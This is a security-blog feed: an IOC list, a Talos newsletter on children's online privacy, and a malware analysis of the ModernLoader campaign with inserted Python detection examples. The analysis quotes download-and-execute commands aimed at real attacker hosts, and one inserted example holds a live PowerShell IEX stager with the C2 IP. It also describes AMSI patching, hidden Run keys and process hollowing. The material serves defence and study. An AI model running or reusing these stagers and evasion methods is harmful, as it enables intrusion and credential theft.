%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\sdhoston.vbs 1
%APPDATA%\sdhoston 1
%APPDATA%\sdhoston\sdhoston.exe 1
%APPDATA%\sdhoston\sdhoston.exe:ZoneIdentifier 1

File Hashes

01bb00216bf6742ac525cb9c6bfefefd250ab0ad14f477c2aad4146b7ea3336e 0f32a114f06e8282588d6e5e47063bcf79348d49744f0acc72b01c296be229a0 103fa3b007fc5e06fccd36f15eddc56071666c220a74ae20d851e635a0aede78 142e773ad2c9e16c377fbf9c61e93eafac2bea3d863c360c8cbd6b2d54082a51 1cfad9e7b4cff0eb8814b80f2281980982f0b2085c6247eac8cc930db08a173b 1e7afe66d3b124abf916c542d5e5fbc1b8922bc928eba5e406bca0b39f0d7019 1fb04ac0a06d4f3598c0ee3533a28b87fe2a0e7af4e13e49e76b9e13a39bc256 215ab3d9e9b4caadde378383717a29b9a52f97ffdd38ef26dd5453b896c72442 24a08963a436434d2ed1a6f82fea0e7b18ad037e6a602ca5dfbe740a11f6fbcf 2c73b7270d050779ac974267fe31ce3ca2d93d8c6a2cc2b1dccef1ef358ffd95 30c8eaf7b304700c5b3a61fa740e3ebb930b03302ad2cc3805fa38d106d302d5 33773be67a946828b9d2c89ba742fbcf71ffd03988291e243ee3744081060cc3 375b00de8de38ec7af0a4b0bef42ed556ce7d5c141c8b72389700ad34d1bd461 3af09a9a2fd53cbafcbb7925f694b8d37f1fd2d40f0f1600288021909b7c4335 3c5895384984695318ac23be4049b059aa60980d614fac5c5a88bf6b0fdb22d5 4b98da8fd57d0c095683b4d3ce85b2120ac8759c184934528105eecd3cb1971b 4ba20254c0e238f1ca4c86b1ebd13536dbd2d7d5bd248ab60e887a22bba9fc26 5a2c975aaa1ed0b722bb5f4098be703728b5419ab1d52616866962bb0fc3c520 5a2eda2ada26ec8e4794d472275294cbd1de7acdad334182798a7a6a1ff4e194 5b24d13171a030fd84cf2638a9072121b1919aa8e02a1170bd247eb3f07fde6a 5f1f6aed00db04bcc2079784d758151589dbcf3eda4394711336cb0a7f7802e4 5ffa9c9d4e5f28a60c40c42b6ccb84eb39be453f556a18cc25ca2d7e3efc80f3 67081c3564081660f61db2b0e4ec525a16bfe0250d8d7496a49bb65aaafffd24 6d00edf9e45e24712b2aa52af50be59081ebf770571a09c6001046dd77ecdc53 6ff434f03d48677e5768cc58c83aa817790fd9506376837e802eaab90a9d5975
*See JSON for more IOCs

Coverage

Product: Protection
Secure Endpoint: This has coverage
Cloudlock: N/A
CWS: This has coverage
Email Security: This has coverage
Network Security: N/A
Stealthwatch: N/A
Stealthwatch Cloud: N/A
Secure Malware Analytics: This has coverage
Umbrella: N/A
WSA: N/A

Screenshots of Detection

Secure Endpoint: screenshot not reproduced

Secure Malware Analytics: screenshot not reproduced

MITRE ATT&CK: screenshot not reproduced

Threat Source newsletter (Sept. 1, 2022) — Conversations about an unborn baby's privacy

1 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

This week marks about 90 days before my wife’s due date with our first child, a baby girl. We’re both incredibly excited and nervous at the same time, and we have much to discuss, like how to lay out the nursery, what times we’ll put her down for a nap and who must be the one to get up the first time she starts crying at 2 a.m. 

But the first true argument my wife and I have had about having a child is whether we should show the baby’s face on Instagram. 

This child isn’t even born yet, and social media companies are probably already building out a data profile on her. I signed up for the What to Expect app so I could follow along with my wife’s pregnancy progress and learn more about what she’s going through and how the baby is developing. Already I’m getting targeted ads on the app and my Instagram for specific brands of baby food, the stroller that we’ve listed on our registry and an automatic children’s toothbrush. Celebrities are increasingly choosing to not show their babies’ faces on social media for paparazzi and physical privacy reasons, which makes sense. But I’m already starting to question what types of privacy decisions I need to make on my daughter's behalf before she’s old enough to know what she’s getting herself into, and I don’t even have to worry about someone selling a picture of my baby to People magazine for $1 million. 

The site we’re using for our baby registry was already asking for her name (we’re not telling anyone the name until she’s born) and my wife’s due date, so conceivably, they’ll know the general time frame in which she’s born. Then what will Amazon start learning about our baby if we use our home assistant to order diapers and food refills? If we use an app to track her sleeping habits and eating schedule, what else could an app conceivably learn and eventually use to send me more targeted ads?  

Refusing to post my baby on Instagram is, admittedly, probably a bridge too far. After all, how else am I going to brag about how cute she is?  

But there are real physical security concerns about posting pictures of children on social media, because some of these sites can, unfortunately, become places where criminals seek out younger victims. Or what happens when she turns 13 and decides she actually doesn’t want to be on the internet? I didn’t get her consent when she was two weeks old, so can I scrub everything the internet already knows about her? 

There really aren’t any systems in place to inform parents about how the pictures or information they share about their children are being used. And most parents certainly aren’t digging deep into Meta’s privacy policy.  

I think, generally, a good rule of thumb is that anything you post on social media could get out of your control. Even with a private Instagram account, there’s no guarantee someone can’t take a screenshot of your post and then share it with someone else. And unless the parents completely plan on going dark off the internet, there’s no real way to work around this.  

When my daughter is born, I’m sure I won't be able to resist sharing her name and her cute outfits on Instagram. But it is interesting to consider the privacy implications of doing so. When my parents stuck a VHS camcorder in my face when I was first born, I don’t think they had to worry about a multi-billion dollar company somehow using that to sell them Wi-Fi-connected diapers.  
  

The one big thing 

An unknown threat actor is using the ModernLoader RAT to spread several other types of malware, including cryptominers and information-stealers. The actors are attempting to compromise vulnerable web applications to serve malware and deliver threats via files masquerading as fake Amazon gift cards. Eventually, it downloads ModernLoader, which can bring other malware families to the party, including the RedLine stealer and XMRig cryptocurrency miner. While this campaign has, so far, mainly targeted Eastern Europe, the actors have been able to obscure their work enough that it’s difficult to identify who they target next or what the attackers’ previous patterns are. 

Why do I care? 

Although the scope of this attack is thus far limited, the attackers in this case seem to be fairly sophisticated, and the use of off-the-shelf tools means it’s tough to track them or attribute these campaigns to a known APT. The infostealers ModernLoader drops can steal users’ important login credentials or important information about the targeted machine, which could be used in future attacks. And any cryptominer has the potential to sap the target machine’s power, costing the target time and money.  

So now what? 

Talos has released new Snort rules and OS Queries to detect activities from this campaign, so those should be deployed immediately. This actor seems to mainly rely on fake offers for Amazon gift cards, so be extra vigilant for those types of scams, even though you already should be on high alert for any deal that seems too good to be true. 

 

Top security headlines from the week


A widespread cyber attack is affecting government services in Montenegro, including water supply systems, transportation services and online government services. Montenegrin officials were quick to blame Russian state-sponsored actors for the attack earlier this week, saying it was the largest attack of this type the country’s ever faced. The FBI sent a dedicated cybersecurity team to the country to help them recover services as fast as possible. The Cuba ransomware group took credit for the attack, saying it had stolen financial documents and more. Cuba made $43.9 million last year in ransom payments, according to the FBI. (CBS News, Recorded Future)

A new warning from the FBI highlighted several recent attacks against decentralized finance (DeFi) platforms that have led to the loss of millions of dollars’ worth of cryptocurrency. The advisory says that attackers are exploiting individual vulnerabilities in popular DeFi platforms’ smart contracts and signature verification systems to break into users’ wallets, or chaining together several flaws to manipulate digital currency pricing. Though the FBI told these platforms to analyze and patch their code, users should ensure they investigate potential platforms appropriately before choosing to store or invest their cryptocurrency somewhere. (ZDNet, Gizmodo)

The U.S. Federal Trade Commission is suing a massive data broker for selling the location data of millions of mobile device users that could be directly tracked on an individual basis. The suit alleges the company did not anonymize the exact location data it was collecting from cell phones before selling it to other third-party outlets. The data could then be used to track a person’s exact activities. This could potentially allow anyone with the data to learn things about a user such as whether they are homeless, if they recently went to an abortion clinic or what their place of worship is, all of which are specifically highlighted in the suit. (Ars Technica, Reuters)


Most prevalent malware files from Talos telemetry over the past week  


MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02 

MD5: 9066dff68c1d66a6d5f9f2904359876c 
Typical Filename: dota-15_id3622928ids1s.exe 
Claimed Product: N/A 
Detection Name: W32.F21B040F7C.in12.Talos 

MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

ModernLoader delivers multiple stealers, cryptominers and RATs

30 August 2022 at 12:00

By Vanja Svajcer

  • Cisco Talos recently observed three separate, but related, campaigns between March and June 2022 delivering a variety of threats, including the ModernLoader bot, RedLine information-stealer and cryptocurrency-mining malware to victims.
  • The actors use PowerShell, .NET assemblies, and HTA and VBS files to spread across a targeted network, eventually dropping other pieces of malware, such as the SystemBC trojan and DCRAT, to enable various stages of their operations. The attackers' use of a variety of off-the-shelf tools makes it difficult to attribute this activity to a specific adversary.
  • The final payload appears to be ModernLoader, which acts as a remote access trojan (RAT) by collecting system information and deploying various modules. In the earlier campaigns from March, we also observed the attackers delivering the cryptocurrency mining malware XMRig. The March campaigns appeared to be targeting Eastern European users, as the constructor utility we analyzed had predefined script templates written in Bulgarian, Polish, Hungarian and Russian.
  • The actors are attempting to compromise vulnerable web applications to serve malware and deliver threats via files masquerading as fake Amazon gift cards.

Technical details

Initial findings

In June 2022, Cisco Talos identified an unusual command line execution in our telemetry. The decoded base64 command is below:
Initial finding: A command executed on the system.

The IP address 31[.]41[.]244[.]231 is located in Russia and hosts several other URLs that follow similar naming conventions.
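The post does not reproduce the encoded command line, so the following is an added example (not code from the Talos post) of how to triage one: PowerShell's -EncodedCommand argument is base64 of UTF-16LE text, and the decoder below extracts URLs and loader keywords from the result. The sample command line is constructed for illustration; it reuses the download server named in the post, and the DownloadString/IEX stager body is an assumption, not the observed script.

```python
"""Decode a PowerShell -EncodedCommand argument and extract loader indicators.

Added example, not from the Talos post. SAMPLE_SCRIPT is a constructed
stager; the URL reuses the download server the post names.
"""
import base64
import re
from typing import Optional

# Constructed sample of what an EDR might record for the initial finding.
SAMPLE_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://31.41.244.231/0x?0=Loader')"
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"(?i)https?://[^\s'\"()]+")
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "mshta", "frombase64string")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script of an -EncodedCommand invocation, else None.

    The payload is base64 over UTF-16LE; decoding it as UTF-8 (a common
    analyst mistake) yields text interleaved with NUL bytes.
    """
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1), validate=True)
    return raw.decode("utf-16-le")


def extract_indicators(script: str) -> dict:
    """Pull URLs, hosts and suspicious keywords out of a decoded script."""
    urls = URL_RE.findall(script)
    hosts = sorted({re.sub(r"^https?://", "", u, flags=re.I).split("/")[0] for u in urls})
    lowered = script.lower()
    keywords = [k for k in SUSPICIOUS if k in lowered]
    # A remote fetch combined with an execution primitive is the loader pattern.
    return {"urls": urls, "hosts": hosts, "keywords": keywords,
            "suspicious": bool(urls) and bool(keywords)}


def triage(cmdline: str) -> dict:
    """Decode (if encoded) and score one process command line."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"decoded": None, "suspicious": False}
    return {"decoded": script, **extract_indicators(script)}


if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

The host list is what you would pivot on: the post notes the same server hosts several similarly named URLs, so a single decoded command line can seed a search for every `0x?0=` style request in proxy logs.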

Autostart command

Following the discovery of the initial command, we identified two other command lines. They result from an executable registered for autorun and from the execution of a scheduled task.

The autorun executable and scheduled task command lines.

The first command connects to the download server and retrieves an HTA application whose script is obfuscated with HTML Guardian, a commercial tool that encodes HTML and script source to hinder inspection.
The content displayed when the HTA file is opened in a browser.

Once deobfuscated, the HTA file runs VBScript that downloads and executes PowerShell code from hxxp[:]//31[.]41[.]244[.]231/0x?0=Loader, which launches the next stage of the loading process.

Deobfuscated HTA code.

The autorunnn.exe module (d9c8e82c42e489ac7a484cb98fed40980d63952be9a88ff9538fc23f7d4eb27f) is a modified variant of the SharpHide open-source utility, which attempts to create a hidden registry entry. It uses NtSetValueKey native API to create a hidden (null-terminated) registry key by adding a null byte in front of the UNICODE_STRING key valuename. In our case, SharpHide is modified to create the following entry:

HKLM or HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shell set to run the command: "explorer.exe, cmd /c mshta hxxp://go[.]clss[.]cl/0k#=GoogleWindowsAnalyticsConfiguration". The program also attempts to create a scheduled task that runs when the user logs onto the system. The task name is "OneDrive Standalone Update Task" and it executes the same command to download and run the PowerShell loader: "mshta hxxp[:]//go[.]clss[.]cl/0k#=GoogleWindowsAnalyticsConfiguration".
Modified SharpHide code is used to hide registry startup entry.

The URL serves PowerShell code which will be executed on the system.

As part of the logon sequence, the system executes a file, which ensures that the registry entry and the scheduled task set to download the next stage are set.
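The hiding trick is easy to check for once the counted name is available. The following added example (not Talos' or SharpHide's code) builds a NUL-prefixed value name the way the modified SharpHide does, shows how the Win32 view of that name collapses to an empty string, and flags such values in a constructed snapshot of a Run key. The RegValue records are an assumption for illustration; on Windows the counted names would come from NtEnumerateValueKey (KEY_VALUE_BASIC_INFORMATION.Name/NameLength), which a collector would feed into hidden_values().

```python
"""Spot Run-key values hidden SharpHide-style (NUL-prefixed value names).

Added example, not Talos' or SharpHide's code. The registry snapshot is
constructed; on Windows the counted names come from NtEnumerateValueKey.
"""
import struct
from dataclasses import dataclass


@dataclass
class RegValue:
    name: str    # counted (native) name exactly as stored; may contain NUL
    data: bytes  # REG_SZ data, UTF-16LE with terminator


def sharphide_name(name: str) -> str:
    """What the modified SharpHide does to the value name before NtSetValueKey."""
    return "\x00" + name


def build_unicode_string(name: str) -> bytes:
    """Serialize a name as UNICODE_STRING (Length, MaximumLength) followed by
    its UTF-16LE buffer laid out inline, so the counted encoding is visible."""
    raw = name.encode("utf-16-le")
    return struct.pack("<HH", len(raw), len(raw) + 2) + raw


def parse_unicode_string(blob: bytes) -> str:
    """Counted decode: the kernel uses Length, not a terminator."""
    length, _max = struct.unpack_from("<HH", blob, 0)
    return blob[4:4 + length].decode("utf-16-le")


def win32_view(name: str) -> str:
    """Win32 registry APIs (and regedit/reg.exe on top of them) treat the name
    as a NUL-terminated string, so a leading NUL makes it read as empty."""
    return name.split("\x00", 1)[0]


def hidden_values(values):
    """Return (visible_name, real_name, command) for every value whose counted
    name differs from its NUL-terminated view."""
    hits = []
    for v in values:
        visible = win32_view(v.name)
        if visible != v.name:
            cmd = v.data.decode("utf-16-le").rstrip("\x00")
            hits.append((visible, v.name, cmd))
    return hits


def reg_sz(text: str) -> bytes:
    return (text + "\x00").encode("utf-16-le")


# Constructed snapshot of HKCU\...\CurrentVersion\Run: one normal value and
# one written through SharpHide with the command quoted in the post.
SAMPLE_RUN_KEY = [
    RegValue("OneDrive",
             reg_sz(r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background')),
    RegValue(sharphide_name("shell"),
             reg_sz("explorer.exe, cmd /c mshta hxxp://go[.]clss[.]cl/0k#=GoogleWindowsAnalyticsConfiguration")),
]

if __name__ == "__main__":
    for visible, real, cmd in hidden_values(SAMPLE_RUN_KEY):
        print(f"hidden value: win32 sees {visible!r}, native name {real!r}\n  -> {cmd}")
```

Because the Win32 view is what most triage tooling relies on, a value that enumerates with an empty name under a Run key is itself the indicator; the native, counted read is what recovers the real name and the command.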

PowerShell loader

The next stage is the PowerShell loader. The loader contains embedded code of three modules, which are loaded using reflection as additional .NET assemblies into the PowerShell process space. The downloaded PowerShell code also downloads and runs auxiliary modules and payloads.

There are usually three modules in this loader format. The first disables AMSI scanning functionality, the second is the final payload, and the last injects the payload into the process space of a newly created process, usually RegSvcs.exe.

KillAMSI
Killamsi.dll is stored as a base64-encoded string split into two pieces: the first two encoded characters and the rest of the encoded assembly DLL, a trivial trick that is likely meant to break signatures matching the base64 form of the MZ header. The DLL contains obfuscated code which patches the AmsiScanBuffer function of Microsoft's AMSI interface (amsi.dll) so that it returns an error value. This prevents antimalware engines from scanning the PowerShell code executed afterwards and allows the attacker to evade detection of the later stages of the loader.
Amsi.dll is decoded, loaded and its Main function called.
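A triage script for loaders of this shape has to undo the string split before it can carve the assembly. The following added example (not Talos' or the loader's own code) folds PowerShell string concatenations, decodes every long base64 run, keeps the ones that start with an MZ header and reports AMSI-related strings in them, alongside a check for the reflective Assembly::Load call. The sample loader text is constructed in make_sample_loader(): a fake PE blob containing the string "AmsiScanBuffer", base64-encoded and split as "TV" + "<rest>" the way the post describes killamsi.dll being stored.

```python
"""Triage a PowerShell loader for embedded .NET assemblies and AMSI patching.

Added example (not Talos' or the loader's own code). The loader text is
constructed below; real loaders differ in layout but not in the tricks.
"""
import base64
import binascii
import re

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# "abc" + 'def'  ->  "abcdef"   (no quotes inside the pieces, which is all base64 needs)
CONCAT = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3""")
REFLECTIVE_LOAD = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I)
INDICATORS = (b"AmsiScanBuffer", b"amsi.dll", b"VirtualProtect")


def fold_concatenations(script: str) -> str:
    """Repeatedly join adjacent string literals so split blobs become contiguous."""
    while True:
        script, n = CONCAT.subn(lambda m: '"' + m.group(2) + m.group(4) + '"', script)
        if n == 0:
            return script


def carve_assemblies(script: str):
    """Decode every long base64 run and keep those that are PE images."""
    found = []
    for m in B64_RUN.finditer(script):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue
        if blob[:2] != b"MZ":
            continue
        found.append({
            "offset": m.start(),
            "size": len(blob),
            "indicators": [i.decode() for i in INDICATORS if i in blob],
        })
    return found


def triage(script: str) -> dict:
    folded = fold_concatenations(script)
    return {
        "reflective_load": bool(REFLECTIVE_LOAD.search(folded)),
        "assemblies": carve_assemblies(folded),
    }


def make_sample_loader() -> str:
    """Constructed loader: fake 'DLL' (MZ + filler + the AMSI export name),
    base64-encoded and split after the first two characters."""
    fake_dll = b"MZ" + b"\x90" * 64 + b"AmsiScanBuffer\x00" + b"\x00" * 16
    b64 = base64.b64encode(fake_dll).decode()
    return (
        f'$k = "{b64[:2]}" + "{b64[2:]}"\n'
        "$asm = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($k))\n"
        "$asm.EntryPoint.Invoke($null, $null)\n"
    )


SAMPLE_LOADER = make_sample_loader()

if __name__ == "__main__":
    print(triage(SAMPLE_LOADER))
```

Run carve_assemblies() on the unfolded text and it finds nothing, because the remaining run no longer decodes to an MZ-prefixed buffer; that is exactly the effect the two-character split is after, and why the fold step comes first.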

Process injector
The last module in the loader file is "friday.dll." It is obfuscated with multiple layers of obfuscation, such as ConfuserEx and .NET Reactor. It creates a new process and places the next injector stage into the newly created RegSvcs.exe process.
Friday.dll module is used to inject the next injection stage into RegSvcs.exe process.

The second-stage injector is an assembly: Managament.inf. It creates an instance of svchost.exe process and injects code using process-hollowing to load the final payload stored in the initial PowerShell loader script.

The injector creates a svchost.exe process in suspended mode and then allocates virtual memory for the injection of the payload module. The original svchost module is unmapped by calling the ZwUnmapViewOfSection.

This is followed by the fairly common injection sequence of API calls to get thread context, copy the data from the payload to the allocated virtual memory, set the thread context to point to the payload entry point and, finally, to resume the suspended thread.

Depending on the bitness of the operating system, the appropriate functions are used for getting and setting the thread context of the 32-bit process from the 64-bit operating system. The injected payload is Client.exe (3f5856a9ec23f6daf20fe9e42e56da1b8dcb0de66b6628a92b554d6e17c02fc3), a ModernLoader instance.
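The hollowing sequence above is distinctive enough to match mechanically in a sandbox API trace. The following added example (not Talos' code) walks a trace looking for a child created with CREATE_SUSPENDED, an unmap of its image, and then the allocate/write/set-context/resume chain against that child, reporting whether the Wow64 context functions were used. The trace records are constructed JSON lines with the fields pid, api, args and ret, and the args.target_pid field (the process a cross-process call acts on) is an assumption standing in for whatever your sandbox emits; adapt load_trace() accordingly. A second, benign launcher that creates a process suspended and simply resumes it is included to show it is not flagged.

```python
"""Match the process-hollowing API sequence in a sandbox API trace.

Added example, not Talos' code. Trace lines are constructed; the field names
(pid, api, args.target_pid, ret) are assumptions about the trace format.
"""
import json

CREATE_SUSPENDED = 0x4

# Ordered steps after the unmap; each entry lists API names satisfying the step.
STEPS = [
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread"},
]
UNMAP = {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}
CREATE = {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}


def load_trace(lines):
    return [json.loads(line) for line in lines if line.strip()]


def find_hollowing(events):
    """One finding per child that was created suspended, had its image
    unmapped, and then received the alloc/write/set-context/resume chain
    from the same parent. Unrelated calls in between are ignored."""
    state = {}   # child pid -> progress record
    findings = []
    for ev in events:
        api, args = ev["api"], ev.get("args", {})
        if api in CREATE:
            if args.get("dwCreationFlags", 0) & CREATE_SUSPENDED:
                state[ev["ret"]] = {"parent": ev["pid"], "image": args.get("lpApplicationName"),
                                    "unmapped": False, "step": 0, "wow64": False}
            continue
        st = state.get(args.get("target_pid"))
        if st is None or st["parent"] != ev["pid"]:
            continue
        if api in UNMAP:
            st["unmapped"] = True
        elif st["step"] < len(STEPS) and api in STEPS[st["step"]]:
            st["wow64"] = st["wow64"] or api.startswith("Wow64")
            st["step"] += 1
            if st["step"] == len(STEPS) and st["unmapped"]:
                findings.append({"parent": st["parent"], "child": args["target_pid"],
                                 "image": st["image"], "wow64_context": st["wow64"]})
    return findings


# Constructed trace: pid 4120 hollows a 32-bit svchost.exe (child 5212);
# pid 7008 is a benign launcher that creates a process suspended and resumes it.
TRACE = r"""
{"pid": 4120, "api": "CreateProcessW", "args": {"lpApplicationName": "C:\\Windows\\SysWOW64\\svchost.exe", "dwCreationFlags": 4}, "ret": 5212}
{"pid": 4120, "api": "Wow64GetThreadContext", "args": {"target_pid": 5212}, "ret": 1}
{"pid": 4120, "api": "ZwUnmapViewOfSection", "args": {"target_pid": 5212}, "ret": 0}
{"pid": 4120, "api": "VirtualAllocEx", "args": {"target_pid": 5212, "dwSize": 327680}, "ret": 4194304}
{"pid": 4120, "api": "WriteProcessMemory", "args": {"target_pid": 5212}, "ret": 1}
{"pid": 4120, "api": "Wow64SetThreadContext", "args": {"target_pid": 5212}, "ret": 1}
{"pid": 4120, "api": "ResumeThread", "args": {"target_pid": 5212}, "ret": 1}
{"pid": 7008, "api": "CreateProcessW", "args": {"lpApplicationName": "C:\\Tools\\app.exe", "dwCreationFlags": 4}, "ret": 7020}
{"pid": 7008, "api": "ResumeThread", "args": {"target_pid": 7020}, "ret": 1}
"""

if __name__ == "__main__":
    for f in find_hollowing(load_trace(TRACE.splitlines())):
        print(f)
```

Requiring the unmap is what keeps debuggers and installers that legitimately start processes suspended out of the results; the Wow64 flag records the 32-bit-in-64-bit case the post describes for the svchost.exe payload.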

ModernLoader bot (aka Avatar bot)

The payload for the initial loader URL is a simple .NET remote access trojan, ModernLoader. ModernLoader has been in use since at least 2019, and some researchers are referring to it as "Avatar bot," although it has nothing in common with the rootkit documented in 2013 using the same name.
ModernLoader's constructor initializes the bot with a hardcoded C2 URL.

Once the bot is initialized, it collects the following information about the system and sends it to the C2 server in an HTTP POST request to hxxp[:]//31[.]41[.]244[.]231/AVAVA/gate[.]php:

  • Win32_ComputerSystemProduct UUID (using WMI to query the configuration data).
  • GPU details from Win32_DisplayConfiguration.
  • The AD or the workgroup name.
  • The external IP address by reading the response from http://ipinfo.io/ip.
  • The IP address country by reading the response from http://ipinfo.io/country.
  • The Windows operating system version information.
  • The amount of RAM.
  • The processor architecture and type.
  • The user privileges (admin or user).
  • Anti malware products installed on the affected system.
  • The amount of space left.
  • The bot version.
  • The name of the computers on the network (through querying local ActiveDirectory data).
  • The presence of an RDP module on the disk (used as auxiliary payload for the bot).


Once the initial data is sent, ModernLoader reads the response to find tasks returned from the server in JSON format. ModernLoader executes tasks using the function DoTask. DoTask accepts very few commands and can either execute a command line or download and execute a file. This limited functionality might have prompted the author to call this bot a loader, but for all intents and purposes, it is a simple remote access trojan (RAT).

The advantage of using a loader such as ModernLoader is that the actor can change the campaigns and deploy different modules in real time. The way the modules are deployed, the payloads often exist only in RAM and not on the hard drive as files. Of course, this approach has a major weakness because it relies on a single IP address, which means the campaign is terminated as soon as the C2 server is offline. ModernLoader runs in an endless loop periodically contacting the C2 server for new tasks until the process is terminated.

ModernLoader is a staple of the campaigns we analyzed. Its main purpose is to download and execute additional payloads and modules, as instructed by the C2 server. Based on our telemetry data and the open-source intelligence, there are more than 10 additional modules hosted on the C2, but not all of them were available for download at the time of writing this post.
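Two traits of the check-in above are visible from a proxy log alone: the bot fetches ipinfo.io/ip and ipinfo.io/country immediately before its first POST to gate.php, and it then polls the same URL in a loop at a fixed interval. The following added example (not Talos' code) encodes both as hunting heuristics over constructed log lines in a simplified "epoch src_ip method host path" format; the format and the 300-second window are assumptions, and parse_line() is where a real proxy format would be adapted. The C2 host in the sample is written defanged, as on this page.

```python
"""Hunt for ModernLoader-style check-ins and beaconing in proxy logs.

Added example, not Talos' code. Log lines are constructed in a simplified
"epoch src_ip method host path" format.
"""
from collections import defaultdict
from statistics import mean, pstdev


def parse_line(line: str) -> dict:
    ts, src, method, host, path = line.split()
    return {"ts": int(ts), "src": src, "method": method, "host": host, "path": path}


def checkin_hosts(events, window=300):
    """src IPs that hit both ipinfo.io endpoints and then POSTed to a gate.php
    within `window` seconds. Returns {src: gate URL}."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    hits = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        posts = (e for e in evs if e["method"] == "POST" and e["path"].lower().endswith("gate.php"))
        for post in posts:
            recent = {(e["host"], e["path"]) for e in evs if post["ts"] - window <= e["ts"] <= post["ts"]}
            if ("ipinfo.io", "/ip") in recent and ("ipinfo.io", "/country") in recent:
                hits[src] = post["host"] + post["path"]
                break
    return hits


def beaconing(events, min_count=5, max_jitter=0.15):
    """(src, url, interval) for POST targets contacted repeatedly at a
    near-constant interval (coefficient of variation of the gaps <= max_jitter)."""
    seq = defaultdict(list)
    for e in events:
        if e["method"] == "POST":
            seq[(e["src"], e["host"] + e["path"])].append(e["ts"])
    out = []
    for (src, url), times in seq.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            out.append((src, url, round(avg)))
    return out


# Constructed log: 10.0.0.23 performs the ModernLoader check-in and polls every
# 60 s; 10.0.0.9 is ordinary traffic that also happens to query ipinfo.io.
SAMPLE_LOG = """
1000 10.0.0.23 GET ipinfo.io /ip
1001 10.0.0.23 GET ipinfo.io /country
1002 10.0.0.23 POST 31[.]41[.]244[.]231 /AVAVA/gate.php
1062 10.0.0.23 POST 31[.]41[.]244[.]231 /AVAVA/gate.php
1122 10.0.0.23 POST 31[.]41[.]244[.]231 /AVAVA/gate.php
1182 10.0.0.23 POST 31[.]41[.]244[.]231 /AVAVA/gate.php
1242 10.0.0.23 POST 31[.]41[.]244[.]231 /AVAVA/gate.php
1500 10.0.0.9 GET ipinfo.io /ip
1510 10.0.0.9 POST www.example.com /login
2000 10.0.0.9 POST www.example.com /api/upload
2130 10.0.0.9 POST www.example.com /api/upload
2145 10.0.0.9 POST www.example.com /api/upload
2400 10.0.0.9 POST www.example.com /api/upload
2410 10.0.0.9 POST www.example.com /api/upload
"""


def load_events(text: str):
    return [parse_line(line) for line in text.strip().splitlines()]


if __name__ == "__main__":
    ev = load_events(SAMPLE_LOG)
    print("check-ins:", checkin_hosts(ev))
    print("beacons:", beaconing(ev))
```

The second heuristic is the one that survives a change of C2 path or IP, since it only depends on the endless polling loop the post describes; the first is cheap to run and pins the check-in to the bot's own fingerprinting order.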

Earlier campaigns

During the investigation, we discovered two earlier campaigns from March 2022 that are closely related to the campaign using 31[.]41[.]244[.]231 as the C2 server. Both campaigns use similar TTPs, with ModernLoader as the main bot that communicates with the C2 server and additional modules served by C2 servers with IP addresses:
  • 62[.]204[.]41[.]192 and
  • 62[.]204[.]41[.]71
There are a few clues that confirm the relationship between these campaigns. The first is the task given to one of the infected systems using 62[.]204[.]41[.]71 as the C2 server. We first see the connection of the infected system to the C2 server and then the task to execute a PowerShell command to download and execute a module from 62[.]204[.]41[.]192, the C2 server used in another campaign.
Connecting two C2 servers in a C2 task assigned to the ModernLoader.

The link between 31[.]41[.]244[.]231 and 62[.]204[.]41[.]71 is found in a downloader, which is a part of the set of standalone downloaders linked with these campaigns. They usually have the name offer.exe and are written in Visual Basic 6. These downloaders provide the second infection vector.

The downloader that proves the second link is 27bb9ee41bc7745854e3f3687955f1a6df3bbd74a7d1050a68fe0d0e6087b4b3, which purports to be an update for the Brave web browser. The sample contains the code to launch PowerShell commands to download and run the code from:

  • hxxp[://]31[.]41[.]244[.]2311/AVAVA/WAW/Documents/go[.]oo
  • hxxp[://]31[.]41[.]244[.]2311/AVAVA/WAW/APPDATA/go[.]oo
  • hxxp[://]62[.]204[.]41[.]71/Offer/Offer[.]oo

